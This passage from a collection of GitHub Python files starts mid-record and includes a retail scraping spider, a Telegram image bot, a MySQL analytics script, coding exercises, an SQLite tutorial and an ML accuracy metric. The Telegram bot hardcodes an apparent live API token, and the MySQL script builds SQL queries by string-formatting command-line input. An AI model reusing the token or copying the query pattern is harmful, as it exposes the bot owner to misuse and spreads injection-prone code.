unavailable\"]'):\n loader.add_value('stock', 0)\n loader.add_xpath('price', './/strong[@id=\"fromPrice\"]/text()')\n product = loader.load_item()\n if product['price'] < 49:\n product['shipping_cost'] = 3.49\n return product\n\n def parse_options(self, hxs, base_url, loader, options):\n regx = re.compile('productData(?!.*productData).*? 
= ({.+})', re.S)\n options = options[0]\n options = json.loads(re.findall(regx, options)[0])\n # name = loader.get_output_value('name')\n for variant in options['skus']:\n loader.replace_value('identifier', variant['id'])\n # loader.replace_value('sku', variant['id'])\n loader.replace_value('price', variant['price'])\n loader.replace_value('name', variant['name'].replace('"', '\"'))\n # option_name = ''\n for attribute in variant['attributes']:\n # option_name += u'{} '.format(attribute['value'])\n if attribute['name'] == 'Colour':\n colour = attribute['value']\n try:\n loader.replace_value('image_url', urljoin(base_url, options['colour'][colour]))\n except:\n pass\n # option_name = option_name.strip()\n product = Product(loader.load_item())\n # product['name'] += u' {}'.format(option_name)\n if product['price'] < 49:\n product['shipping_cost'] = 3.49\n formdata = {'dataType':'json', 'quantity':'1', 'storeId':'10151',\n 'productId':variant['identifier'], 'sku':variant['id']}\n #self.log('Url %s. Formdata %s' %(base_url, formdata))\n yield FormRequest('http://www.dunelm.com/webapp/wcs/stores/servlet/AjaxProductAvailabilityView',\n formdata=formdata,\n meta={'product':product, 'tries':1}, callback=self.parse_stock)\n\n def parse_stock(self, response):\n tries = response.meta['tries']\n try:\n stock = json.loads(response.body)\n self.log('Success with %d tries' %tries)\n except:\n tries+=1\n if tries > 50:\n self.log('Gave up retrying stock status for %s' %response.request.headers['Referer'])\n yield response.meta['product']\n return\n self.log('Trying %d get stock status' %tries)\n yield response.request.replace(dont_filter=True, \n meta={'product':response.meta['product'], 'tries':tries})\n return\n deliveries = ('expressAvailableClass', 'rocsAvailableClass', 'standardAvailableClass')\n product = response.meta['product']\n product['stock'] = 0\n for delivery in deliveries:\n if stock[delivery] == \"available\":\n del product['stock']\n break\n\n yield product\n ","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/express_gifts/dunelm.py","file_name":"dunelm.py","file_ext":"py","file_size_in_byte":7188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20339028729","text":"import telebot\nfrom telebot import types\nfrom PIL import Image\nfrom PIL import ImageFilter\nfrom PIL import ImageOps\nimport os\nimport time\n\n\nbot = telebot.TeleBot('6974578088:AAE-qBT6FVPesqpH6WcDTa61TJaXwTyyO_o')\nproject_folder = \"/Users/Fedor/PycharmProjects/2kurs\"\n\nglobal ind\nind = 0\n\n\ndef delete_jpg_files(folder_path):\n try:\n files = os.listdir(folder_path)\n\n jpg_files = [file for file in files if file.endswith(\".jpg\")]\n\n for jpg_file in jpg_files:\n file_path = os.path.join(folder_path, jpg_file)\n os.remove(file_path)\n print(f\"Удален файл: {file_path}\")\n\n except Exception as e:\n print(f\"Произошла ошибка при удалении файлов: {e}\")\n\n\n@bot.message_handler(commands=['start'])\ndef start_message(message):\n keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)\n btn1 = types.KeyboardButton(text='/start')\n btn2 = types.KeyboardButton(text='/help')\n keyboard.add(btn1, btn2)\n bot.send_message(message.chat.id, text='выберите функцию', reply_markup=keyboard)\n\n\n\n@bot.message_handler(commands=['help'])\ndef help(message):\n k_b = types.ReplyKeyboardMarkup(resize_keyboard=True)\n btn3 = types.KeyboardButton(text='/reverse_photo')\n btn4 = types.KeyboardButton(text='/blur_photo')\n 
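The parse_options method above digs a JavaScript object literal out of an inline script block with a regex and hands it to json.loads. A minimal sketch of the same technique on made-up markup (the productData name follows the record; everything else is illustrative, and the trick only works when the literal happens to be valid JSON):

import json
import re

script = '''
var tracking = {};
var productData = {"skus": [{"id": "A1", "price": 9.99}]};
'''

# Capture the last `productData = {...}` assignment, as the spider's
# negative lookahead does, then parse the object literal as JSON.
match = re.search(r'productData(?!.*productData).*? = ({.+})', script, re.S)
if match:
    data = json.loads(match.group(1))
    print(data['skus'][0]['price'])  # 9.99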
btn5 = types.KeyboardButton(text='/negative_photo')\n k_b.add(btn3)\n k_b.add(btn4)\n k_b.add(btn5)\n bot.send_message(message.chat.id, text='Выберите обработку', reply_markup=k_b)\n\n\n@bot.message_handler(commands=['reverse_photo'])\ndef reverse(message):\n msg = bot.send_message(message.chat.id, \"Send photo\")\n bot.register_next_step_handler(msg, r_photo)\n\n\ndef r_photo(message):\n global ind\n ind += 1\n file_id = message.photo[-1].file_id\n file_info = bot.get_file(file_id)\n file_path = file_info.file_path\n downloaded_file = bot.download_file(file_path)\n\n with open('saved_photo' + str(ind) + '.jpg', 'wb') as new_file:\n new_file.write(downloaded_file)\n\n im = Image.open('saved_photo' + str(ind) + '.jpg')\n im = im.transpose(Image.FLIP_LEFT_RIGHT)\n\n bot.send_photo(message.chat.id, im)\n\n time.sleep(10)\n delete_jpg_files(project_folder)\n\n\n\n\n@bot.message_handler(commands=['blur_photo'])\ndef blur(message):\n msg = bot.send_message(message.chat.id, \"Send photo\")\n bot.register_next_step_handler(msg, b_photo)\n\n\ndef b_photo(message):\n global ind\n ind += 1\n file_id = message.photo[-1].file_id\n file_info = bot.get_file(file_id)\n file_path = file_info.file_path\n downloaded_file = bot.download_file(file_path)\n\n with open('saved_photo' + str(ind) + '.jpg', 'wb') as new_file:\n new_file.write(downloaded_file)\n\n im = Image.open('saved_photo' + str(ind) + '.jpg')\n\n for i in range(100):\n im = im.filter(ImageFilter.BLUR)\n\n bot.send_photo(message.chat.id, im)\n\n time.sleep(10)\n delete_jpg_files(project_folder)\n\n\n\n\n\n\n\n@bot.message_handler(commands=['negative_photo'])\ndef negative(message):\n msg = bot.send_message(message.chat.id, \"Send photo\")\n bot.register_next_step_handler(msg, n_photo)\n\n\ndef n_photo(message):\n global ind\n ind += 1\n file_id = message.photo[-1].file_id\n file_info = bot.get_file(file_id)\n file_path = file_info.file_path\n downloaded_file = bot.download_file(file_path)\n\n with open('saved_photo' + str(ind) + '.jpg', 'wb') as new_file:\n new_file.write(downloaded_file)\n\n im = Image.open('saved_photo' + str(ind) + '.jpg')\n\n im = ImageOps.invert(im)\n\n bot.send_photo(message.chat.id, im)\n\n time.sleep(10)\n delete_jpg_files(project_folder)\n\n\nbot.polling(none_stop=True, interval=0)\n","repo_name":"ZdobnyakovGT/Zdobnyakov_Labs_IU5-34B","sub_path":"HW.py","file_name":"HW.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35720588608","text":"#!/usr/bin/env python3\nimport MySQLdb as mysql\nimport json\nimport os\nimport sys\nfrom statistics import pstdev, stdev \n\ndb_config = json.loads(sys.argv[1])\nstart_date = sys.argv[2]\n\nmysql_connection = mysql.connect(database=db_config['database'], user=db_config['username'], password=db_config['password'])\ncursor = mysql_connection.cursor()\n\ndef get_sit_times():\n cursor.execute(\"\"\"select bookings.id, bookings.car_id, booking_details.type, booking_details.longitude,\n booking_details.latitude, booking_details.created_at, bookings.user_id from bookings\n join booking_details on bookings.id = booking_details.booking_id \n where date(bookings.created_at) > date(\"{}\") \n and hour(bookings.created_at) between 7 + 7 and 20 + 7 \n order by car_id desc, bookings.created_at asc\n ;\"\"\".format(start_date))\n\n line = cursor.fetchone()\n\n i = 1\n end_time = 0\n sit_time = []\n mult = 200.0\n \n while line:\n if i == 1:\n i+=1\n line = cursor.fetchone()\n else:\n carId = 
line[1]\n            while line and line[1] == carId:\n                if line[2] == 'end':\n                    end_time = line[5]\n                    long_end = round(line[3] * mult) / mult\n                    lat_end = round(line[4] * mult) / mult\n                else:\n                    start_time = line[5]\n                    try:\n                        time_between = start_time - end_time\n                        \n                        long_start= round(line[3] * mult) / mult\n                        lat_start = round(line[4] * mult) / mult\n                        if long_start == long_end and lat_start == lat_end:\n                            sit_time += [(round(line[4]*2 * mult)/(2 * mult), round(line[3]*2 * mult)/(2 * mult), time_between.seconds, line[0], line[6])]\n                    except:\n                        pass\n                i += 1\n                line = cursor.fetchone()\n\n            line = cursor.fetchone()\n    averages = {}\n    for i in sit_time:\n        points = (round(i[0]*2 * mult)/(2 * mult) , round(i[1]*2 * mult)/(2 * mult))\n        seconds = i[2]\n        if points in averages:\n            averages[points] += [seconds]\n        else:\n            averages[points] = [seconds]\n    \n    for i in averages.keys():\n        av = sum(averages[i])/len(averages[i])\n        averages[i] = [av, len(averages[i])]\n    \n    \n    real_sit_time= []\n    for i in averages.keys():\n        long = i[0]\n        lat = i[1]\n        time = averages[i][0]\n        freq = averages[i][1]\n        real_sit_time += [(long, lat, time, freq)]\n    \n    \n    \"\"\"\n    with open(\"/var/log/outgoing/sit-time-points.js\", \"w\") as outfile: \n        outfile.write(\"{}{}\".format(\"var points=\", json.dumps(real_sit_time)))\n        # The indices in the subarray are [lat, lng, sit_time, booking_id, user_id]\n    \"\"\"\n    return sit_time\n    #return list(map(lambda x: x[2], sit_time))\n\ndef get_standard_deviation(sit_times):\n    only_times = list(map(lambda x: x[2], sit_times))\n    return stdev(only_times)\n\ndef get_outlier_bookings(standard_deviation, sit_times, percent_outside_accepted):\n    outliers = list(filter(lambda x: abs(standard_deviation - x[2]) > standard_deviation + ((percent_outside_accepted / 100) * standard_deviation) , sit_times))\n    return outliers\n\ndef outliers_by_user(booking_list):\n    outliers_counts = {}\n    for user in booking_list:\n        if user[4] in outliers_counts:\n            outliers_counts[user[4]] += 1\n        else:\n            outliers_counts[user[4]] = 1\n    users_list = list(filter(lambda x: outliers_counts[x], outliers_counts))\n    users_list = list(map(lambda x: str(x), users_list))\n    query = \"select id, first_name, last_name from users where id in ({});\".format(\", \".join(users_list))\n    cursor.execute(query)\n    user_names = {a : (b, c) for a, b, c in cursor}\n    query = \"select user_id, count(id) from bookings where user_id in ({}) group by user_id;\".format(\", \".join(users_list))\n    cursor.execute(query)\n    bookings_counts = {a : b for a, b in cursor}\n    user_ratios = {}\n    for key in outliers_counts:\n        user_ratios[key] = {\n            \"ratio\": outliers_counts[key] / bookings_counts[key],\n            \"bookings\": bookings_counts[key],\n            \"outliers\": outliers_counts[key]\n        }\n    output = {}\n    for user in user_names:\n        output[user_names[user]] = user_ratios[user]\n\n    return user_ratios\n\nif __name__ == \"__main__\":\n    sit_times = get_sit_times()\n    standard_deviation = get_standard_deviation(sit_times)\n    outliers = get_outlier_bookings(standard_deviation, sit_times, 0)\n    users_with_outliers = outliers_by_user(outliers) \n    print(json.dumps(users_with_outliers))\n    mysql_connection.close()\n\n","repo_name":"WaiveCar/Waivecar","sub_path":"analysis/sitTimes.py","file_name":"sitTimes.py","file_ext":"py","file_size_in_byte":4782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
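get_outlier_bookings in the record above flags a booking once its sit time falls outside an accepted band derived from the standard deviation. A common variant keys the band off the mean instead; a minimal self-contained sketch (illustrative numbers only, not Waivecar data):

from statistics import mean, stdev

sit_times = [310, 295, 330, 305, 4200, 315, 290]  # seconds

mu = mean(sit_times)
sigma = stdev(sit_times)

# Flag everything farther than two standard deviations from the mean.
outliers = [t for t in sit_times if abs(t - mu) > 2 * sigma]
print(outliers)  # [4200]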
{"seq_id":"7328566749","text":"xcount = 0\nycount = 0\n\nread = []\n\nwith open('December2.txt') as file:\n\tfor line in file:\n\t\tline = line.split(\" \")\n\t\tread.append(line)\n\t\tif line[0] == \"forward\":\n\t\t\txcount += int(line[1])\n\t\tif line[0] == \"down\":\n\t\t\tycount -= int(line[1])\n\t\tif line[0] == \"up\":\n\t\t\tycount += int(line[1])\n\nprint(xcount * abs(ycount))\n\nposition = 0\ndepth = 0\naim = 0\n\nfor i in range(len(read)):\n\tif read[i][0] == \"forward\":\n\t\tdepth += (aim * int(read[i][1]))\n\t\tposition += int(read[i][1])\n\tif read[i][0] == \"down\":\n\t\taim += int(read[i][1])\n\tif read[i][0] == \"up\":\n\t\taim -= int(read[i][1])\n\t\t\nprint(position * depth)\n","repo_name":"eduardoloz/CCC","sub_path":"AdventOfCode/2-Dive/December2.py","file_name":"December2.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"41558741430","text":"class LinearSearch:\n\n\n    def search(self,list,n):\n\n        for i in range(len(list)):\n            if list[i]==n:\n                return True\n        return False\n\n\n\nlist = [1,2,3,4,5]\nobj=LinearSearch();\nresult =obj.search(list,7);\nif result:\n    print(\"found\")\nelse:\n    print(\"not found\")","repo_name":"Mohit0888/Variables","sub_path":"variable/linearSearch.py","file_name":"linearSearch.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
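The next record implements selection sort and a recursive binary search by hand to locate where a number falls inside a sorted sequence. For comparison, the standard library's bisect module returns that insertion point directly; a minimal sketch (illustrative values):

import bisect

values = sorted([3.0, 1.5, 7.2, 4.4, 9.0])
target = 5.0

# Index of the first element >= target; everything left of it is smaller.
pos = bisect.bisect_left(values, target)
print(pos, values[:pos])  # 3 [1.5, 3.0, 4.4]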
{"seq_id":"70507793372","text":"# Write a program that takes a sequence of numbers separated by spaces as input and also\r\n# asks the user for an arbitrary number.\r\n# As an advanced-level extension you can validate that the input matches the format\r\n# specified in the task.\r\n# The program then works by the following algorithm:\r\n# --Convert the entered sequence into a list\r\n# --Sort the list in ascending order (define a function to implement the sort)\r\n# --Find the position of the element that is smaller than the number entered by the user while\r\n# the next element is greater than or equal to that number.\r\n#\r\n# To locate the element's position, use the binary search algorithm discussed in\r\n# this module. Implement it as a separate function as well.\r\n#\r\n# Hint\r\n# Remember that some numbers may not satisfy the stated condition. In that case an\r\n# appropriate message must be printed.\r\n\r\n# you can choose: enter the numbers from the keyboard or load them from a file\r\n\r\nimport sys\r\n\r\ndef sort(L):\r\n    for i in range(len(L)):\r\n        idx_min = i\r\n        for j in range(i, len(L)):\r\n            if L[j] < L[idx_min]:\r\n                idx_min = j\r\n        if i != idx_min:\r\n            L[i], L[idx_min] = L[idx_min], L[i]\r\n    return L\r\n\r\ndef search(L, num, left, right):\r\n    if left > right:\r\n        return False\r\n    middle = (right + left) // 2\r\n    if L[middle] == num:\r\n        return middle\r\n    elif num < L[middle]:\r\n        return search(L, num, left, middle - 1)\r\n    else:\r\n        return search(L, num, middle + 1, right)\r\n\r\n\r\n# alphabet of allowed characters\r\nsymbols = ('0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '.', '-', ' ', '\\n')\r\n\r\ninput_str = ''  # the entered string is stored here\r\nerror_symbol = ''  # variable for collecting invalid characters\r\nmy_str = ''\r\n\r\nanswer = input(\"Take the data from a file (1) or enter it from the keyboard (2)?\\n\")\r\nif answer == '1':\r\n    file_name = input('Enter the name of the file with the sequence of numbers ')\r\n    try:\r\n        with open(file_name) as file:\r\n            my_str = file.readline()\r\n    except FileNotFoundError:\r\n        print('File not found')\r\n        exit()\r\nelif answer == '2':\r\n    print('Enter a sequence of numbers separated by spaces.')\r\n    my_str = sys.stdin.readline()\r\nelse:\r\n    print('Next time you run the program, enter \"1\" or \"2\"\\nShutting down...')\r\n    exit()\r\n\r\nfor char in my_str:\r\n    if char in symbols:\r\n        input_str += char\r\n    else:\r\n        error_symbol += char\r\nif error_symbol:\r\n    print('You entered invalid characters: \"' + error_symbol + '\"')\r\n\r\n# in case the user put the minus sign after a number\r\ntry:\r\n    list_of_numbers = list(map(float, input_str.split()))\r\nexcept ValueError:\r\n    print('The \"-\" sign must come before a number\\nShutting down...')\r\n    exit()\r\n\r\n# read a number and append it to the list\r\nnumber = float(input('Enter a number: \\n'))\r\nprint('List before sorting: ' + str(list_of_numbers))\r\nlist_of_numbers.append(number)\r\n\r\n# sort\r\nlist_of_numbers = sort(list_of_numbers)\r\n\r\n# find the position of the number entered by the user\r\npoz = search(list_of_numbers, number, 0, len(list_of_numbers))\r\nif poz == 0:\r\n    print('The entered number is the smallest in the sequence')  # so it\r\n    # does not satisfy our conditions\r\nelif list_of_numbers[-1] == number and list_of_numbers[-1] != list_of_numbers[-2]:\r\n    print('The entered number is the largest in the sequence')  # and no later element\r\n    # equals the entered one, so it does not satisfy our conditions\r\nelse:\r\n    while list_of_numbers[poz] == list_of_numbers[poz - 1]:\r\n        poz -= 1\r\n    print(f'Index of the list element that is smaller than {number}: ' + str(poz - 1))\r\nlist_of_numbers.pop(poz)\r\nprint('List after sorting: ' + str(list_of_numbers))\r\n","repo_name":"ivmiller/HomeWork","sub_path":"1791-2.py","file_name":"1791-2.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"43250331877","text":"import argparse\nimport subprocess\n\n# usage: python main.py \"filepathtogradebook\" \"filepathtomajors\" \"filepathtoresults\" \"gradebook_studentid\" \"gradebook_assignment\" \"major_studentid\" \"major_name\" lowerthresholdinclusive higherthresholdexclusive\ndef get_arguments():\n\tparser = 
argparse.ArgumentParser()\n\tparser.add_argument('gradebook')\n\tparser.add_argument('majorlist')\n\tparser.add_argument('range_results')\n\tparser.add_argument('grade_id')\n\tparser.add_argument('grade_column')\n\tparser.add_argument('major_id')\n\tparser.add_argument('major_column')\n\tparser.add_argument('lower_threshold', type=float)\n\tparser.add_argument('higher_threshold', type=float)\n\treturn parser.parse_args()\n\t\n# runs both range.py and pie.py so as to simplify process for user\ndef main():\n\targs = get_arguments()\n\tsubprocess.run([\"python\", \"range.py\", args.gradebook, args.majorlist, args.range_results, args.grade_id, args.grade_column, args.major_id, args.major_column, str(args.lower_threshold), str(args.higher_threshold)])\n\tsubprocess.run([\"python\", \"pie.py\", args.range_results, args.grade_column, str(args.lower_threshold), str(args.higher_threshold)])\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"Amndeep7/DrexelCSDepartmentAnalysisTool","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38819414985","text":"import sqlite3\r\ndb = sqlite3.connect('python_programming_db')\r\ncursor = db.cursor() # Get a cursor object\r\n\r\ncursor.execute('''\r\n DROP TABLE IF EXISTS Student;\r\n''')\r\n\r\ncursor.execute(''' \r\n CREATE TABLE IF NOT EXISTS Student\r\n (\r\n id INTEGER PRIMARY KEY, \r\n name TEXT,\r\n grade INTEGER\r\n );\r\n''')\r\ndb.commit()\r\n\r\n# Inserting students\r\ncursor.execute('''\r\n INSERT INTO Student\r\n (\r\n id,\r\n name, \r\n grade\r\n )\r\n VALUES\r\n (\r\n 55,\r\n 'Carl Davis',\r\n 61\r\n ),\r\n (\r\n 66,\r\n 'Dennis Fredrickson',\r\n 88\r\n ),\r\n (\r\n 77,\r\n 'Jane Richards',\r\n 78\r\n ),\r\n (\r\n 12,\r\n 'Peyton Sawyer',\r\n 45\r\n ),\r\n (\r\n 2,\r\n 'Lucas Brooke',\r\n 99\r\n )\r\n ''')\r\ndb.commit()\r\n\r\n# Print all records in Student\r\ncursor.execute('''\r\n SELECT * FROM Student;\r\n ''')\r\nquery_student = cursor.fetchall()\r\nprint(query_student)\r\n\r\n# Select all records with grade between 60 and 80\r\ncursor.execute('''\r\n SELECT * FROM Student\r\n WHERE\r\n grade BETWEEN 60 AND 80;\r\n ''')\r\nquery_student = cursor.fetchall()\r\nprint(query_student)\r\n\r\n# Update Carl Davis' grade to 65\r\ncursor.execute('''\r\n UPDATE Student\r\n SET grade = 65\r\n WHERE\r\n name = 'Carl Davis';\r\n ''')\r\ndb.commit()\r\n\r\n# Print all records in Student\r\ncursor.execute('''\r\n SELECT * FROM Student;\r\n ''')\r\nquery_student = cursor.fetchall()\r\nprint(query_student)\r\n\r\n# Delete Dennis Fredrickson's row\r\ncursor.execute('''\r\n DELETE FROM Student\r\n WHERE\r\n name = 'Dennis Fredrickson'\r\n''')\r\n\r\n# Print all records in Student\r\ncursor.execute('''\r\n SELECT * FROM Student;\r\n ''')\r\nquery_student = cursor.fetchall()\r\nprint(query_student)\r\n\r\n# Change the grade of all people with an id less than 55\r\ncursor.execute('''\r\n UPDATE Student\r\n SET grade = 1\r\n WHERE\r\n id < 55;\r\n ''')\r\ndb.commit()\r\n\r\n# Print all records in Student\r\ncursor.execute('''\r\n SELECT * FROM Student;\r\n ''')\r\nquery_student = cursor.fetchall()\r\nprint(query_student)\r\n\r\ndb.close()\r\nprint('Connection to database closed')\r\n","repo_name":"ehmtang/SE-Bootcamp-HyperionDev","sub_path":"T47 - 
SQLite/database_manip.py","file_name":"database_manip.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69980423772","text":"import copy\nimport warnings\nimport numpy as np\nimport torch\n\nfrom graph4nlp.pytorch.modules.evaluation.base import EvaluationMetricBase\n\n\nclass Accuracy(EvaluationMetricBase):\n \"\"\"\n Calculate precision, recall, F1 for each labels\n\n Parameters\n ----------\n metrics: list\n Indicate the metric for the class to return.\n Note that each metric must be one of ``precision``, ``recall``, ``F1``, ``accuracy``.\n And the results' order is the same as the metrics.\n \"\"\"\n\n def __init__(self, metrics):\n super().__init__()\n if isinstance(metrics, list):\n for metric in metrics:\n if metric not in [\"precision\", \"recall\", \"F1\", \"accuracy\"]:\n raise TypeError(\n \"argument metric must be list of str containing \"\n \"'precision', 'recall', 'F1', 'accuracy'\"\n )\n self.metrics = metrics\n\n def calculate_scores(\n self, ground_truth, predict, average=None, zero_division=\"warning\", sample_weight=None\n ):\n \"\"\"\n The function to calculate the expected metrics for each labels\n\n Parameters\n ----------\n ground_truth: torch.Tensor\n Ground truth (correct) target values, 1d tensor\n predict: torch.Tensor\n The predicted target values generated by classifier, 1d tensor\n average: string or None, [None (default), 'micro', 'macro', 'weighted']\n If set ``None``, it will return the scores for each class.\n Otherwise, it will be reduced by the strategy as follows:\n\n ``'micro'``:\n Calculate metrics globally by counting the total true positives,\n false negatives and false positives.\n\n ``'macro'``:\n Calculate metrics for each label, and calculate the unweighted\n average values. This does not take label imbalance into account.\n\n ``'weighted'``:\n Calculate metrics for each label, and calculate the weighted\n average value. Note that the weight is the number of the true\n instances for each label.\n\n zero_division: \"warning\", 0, 1, default=\"warning\"\n Sets the value to return when there is a zero division.\n\n If set to \"warning\", this acts as 0, but warnings are also raised.\n\n sample_weight: None\n The sample weight. 
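The micro, macro and weighted strategies this docstring describes differ only in where the summation happens; a small worked example, independent of this class and using illustrative counts only:

import numpy as np

# Two classes; per-class true positives, predicted positives, actual positives.
tp = np.array([8, 1])
pred = np.array([10, 3])
true = np.array([9, 4])

per_class = tp / pred                           # precision per label: [0.8, 0.333]
macro = per_class.mean()                        # unweighted mean -> ~0.567
micro = tp.sum() / pred.sum()                   # pool counts first -> 9/13 ~ 0.692
weighted = np.average(per_class, weights=true)  # support-weighted -> ~0.656
print(macro, micro, weighted)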
It is not implemented yet.\n\n Returns\n -------\n scores: list[object]\n Return the expected metrics initialized in init function in ``precision``, ``recall``, \\\n ``F1`` order\n \"\"\"\n ground_truth_np, predict_np = self._check_available(ground_truth, predict, zero_division)\n\n # calculate accuracy\n scores = ground_truth_np == predict_np\n accuracy_score = np.average(scores)\n\n if self.metrics is [\"precision\"]:\n return [accuracy_score]\n\n mcm = self._calculate_confusion_matrix(ground_truth=ground_truth_np, predict=predict_np)\n\n tp_sum = mcm[:, 1, 1]\n pred_sum = tp_sum + mcm[:, 0, 1]\n gt_sum = tp_sum + mcm[:, 1, 0]\n\n if average == \"micro\":\n tp_sum = np.array([tp_sum.sum()])\n pred_sum = np.array([pred_sum.sum()])\n gt_sum = np.array([gt_sum.sum()])\n\n # calculate precision and recall\n precision = self._prf_divide(tp_sum, pred_sum, zero_division=zero_division)\n recall = self._prf_divide(tp_sum, gt_sum, zero_division=zero_division)\n\n # calculate F_beta\n beta2 = 1 ** 2 # note: only F1 here\n denominator = beta2 * precision + recall\n\n denominator[denominator == 0.0] = 1 # avoid division by 0\n f_score = (1 + beta2) * precision * recall / denominator\n\n if average == \"weighted\":\n weighted = gt_sum\n else:\n weighted = None\n\n if average is not None:\n precision = np.average(precision, weights=weighted)\n recall = np.average(recall, weights=weighted)\n f_score = np.average(f_score, weights=weighted)\n scores = []\n\n for metric_name in self.metrics:\n if metric_name == \"precision\":\n scores.append(precision)\n elif metric_name == \"recall\":\n scores.append(recall)\n elif metric_name == \"F1\":\n scores.append(f_score)\n elif metric_name == \"accuracy\":\n scores.append(accuracy_score)\n else:\n raise NotImplementedError()\n return scores\n\n @staticmethod\n def _prf_divide(numerator, denominator, zero_division):\n \"\"\"\n The function performs division and handles zero-division situations.\n\n Parameters\n ----------\n numerator: numpy.ndarray\n denominator: numpy.ndarray\n zero_division: \"warning\", 0, 1, default=\"warning\"\n Sets the value to return when there is a zero division.\n\n If set to \"warning\", this acts as 0, but warnings are also raised.\n Returns\n -------\n results: numpy.ndarray\n The division results.\n\n \"\"\"\n zero_mask = denominator == 0.0\n denominator_cp = copy.deepcopy(denominator)\n denominator_cp[zero_mask] = 1.0\n ret = numerator / denominator_cp\n if np.sum(zero_mask) == 0:\n return ret\n ret[zero_mask] = 0.0 if zero_division in [\"warning\", 0] else 1.0\n if zero_division == \"warning\":\n warnings.warn(\"zero division encountered\")\n return ret\n\n @staticmethod\n def _check_available(ground_truth, predict, zero_division):\n \"\"\"\n The function to check the parameters.\n If all tests are passed, it will convert the tensor to numpy.\n\n Parameters\n ----------\n ground_truth: Any\n predict: Any\n zero_division: Any\n\n Returns\n -------\n ground_truth: numpy.ndarray\n numpy version of tensor ground_truth\n predict: numpy.ndarray\n numpy version of tensor predict\n\n Raises\n -------\n TypeError: TypeError\n ValueError: ValueError\n \"\"\"\n if not isinstance(ground_truth, torch.Tensor):\n raise TypeError(\"argument ground_truth must be torch.tensor\")\n if not isinstance(predict, torch.Tensor):\n raise TypeError(\"argument predict must be torch.tensor\")\n if ground_truth.dtype not in [torch.int, torch.int8, torch.int16, torch.int32, torch.int64]:\n raise TypeError(\"argument ground_truth must be int tensor\")\n if 
predict.dtype not in [torch.int, torch.int8, torch.int16, torch.int32, torch.int64]:\n raise TypeError(\"argument predict must be int tensor\")\n if len(ground_truth.shape) != 1:\n raise TypeError(\"argument ground_truth must be 1d tensor\")\n if len(predict.shape) != 1:\n raise TypeError(\"argument predict must be 1d tensor\")\n if ground_truth.shape[0] != predict.shape[0]:\n raise ValueError(\"argument ground_truth and predict must be the same shape\")\n\n zero_division_ok = False\n if isinstance(zero_division, str) and zero_division == \"warning\":\n zero_division_ok = True\n elif isinstance(zero_division, (int, float)) and zero_division in [0, 1]:\n zero_division_ok = True\n\n if not zero_division_ok:\n raise ValueError(\"argument zero_division must be in ['warning', 0, 1]\")\n\n return ground_truth.numpy(), predict.numpy()\n\n def _calculate_confusion_matrix(self, ground_truth, predict):\n \"\"\"\n The function to calculate the confusion matrix for multi-class inputs.\n The labels will be collected and relabeled. (eg: [1, 2, 3] --> [0, 1, 2])\n\n In multi-class confusion matrix :math:`MCM`, the count of true negatives is\n :math:`MCM_{:,0,0}`, false positives is :math:`MCM_{:,0,1}`, false negatives\n is :math:`MCM_{:,1,0}` and true positive is :math:`MCM_{:,1,1}`.\n\n Parameters\n ----------\n ground_truth: numpy.ndarray\n predict: numpy.ndarray\n\n Returns\n -------\n confusion_matrix: numpy.ndarray\n The confusion matrix which has the shape: [num_labels, 2, 2]\n \"\"\"\n # select all labels, remove duplicates and sort\n unique_labels = sorted(self._get_unique_labels(ground_truth, predict))\n\n # do relabeling\n ground_truth_transformed = np.searchsorted(unique_labels, ground_truth)\n predict_transformed = np.searchsorted(unique_labels, predict)\n\n # the number of labels after relabeling\n n_labels = len(unique_labels)\n\n tp = ground_truth_transformed == predict_transformed\n tp_bins = ground_truth_transformed[tp]\n tp_sum = np.bincount(tp_bins, weights=None, minlength=n_labels)\n pred_sum = np.bincount(predict_transformed, minlength=n_labels)\n gt_sum = np.bincount(ground_truth_transformed, minlength=n_labels)\n fp = pred_sum - tp_sum\n fn = gt_sum - tp_sum\n tp = tp_sum\n tn = ground_truth_transformed.shape[0] - tp - fp - fn\n return np.array([tn, fp, fn, tp]).T.reshape(-1, 2, 2)\n\n @staticmethod\n def _get_unique_labels(*lists):\n \"\"\"\n find the unique elements in the given lists\n\n Parameters\n ----------\n lists: [numpy.ndarray]\n List of lists which contain labels.\n Returns\n -------\n unique_labels: numpy.ndarray\n It has unique labels encountered in the ``lists``.\n \"\"\"\n ret = []\n for li in lists:\n unique_li = np.unique(li)\n ret.extend(unique_li.tolist())\n ret = list(set(ret))\n return np.array(ret)\n","repo_name":"graph4ai/graph4nlp","sub_path":"graph4nlp/pytorch/modules/evaluation/accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":9915,"program_lang":"python","lang":"en","doc_type":"code","stars":1637,"dataset":"github-code","pt":"32"} +{"seq_id":"28824983423","text":"import os\n\nfrom collections import OrderedDict\nfrom PyQt4.QtXml import QDomDocument\nfrom PyQt4.QtCore import QDir, QFileInfo\n\nfrom qgis.gui import QgsMapCanvasLayer\nfrom qgis.core import QgsVectorLayer, QgsRasterLayer, QgsMapLayerRegistry, QgsMapSettings, QgsProject\n\n\ndef layer_by_id(layerid):\n return QgsMapLayerRegistry.instance().mapLayers()[layerid]\n\n\ndef iternodes(nodes):\n for index in xrange(nodes.length()):\n yield 
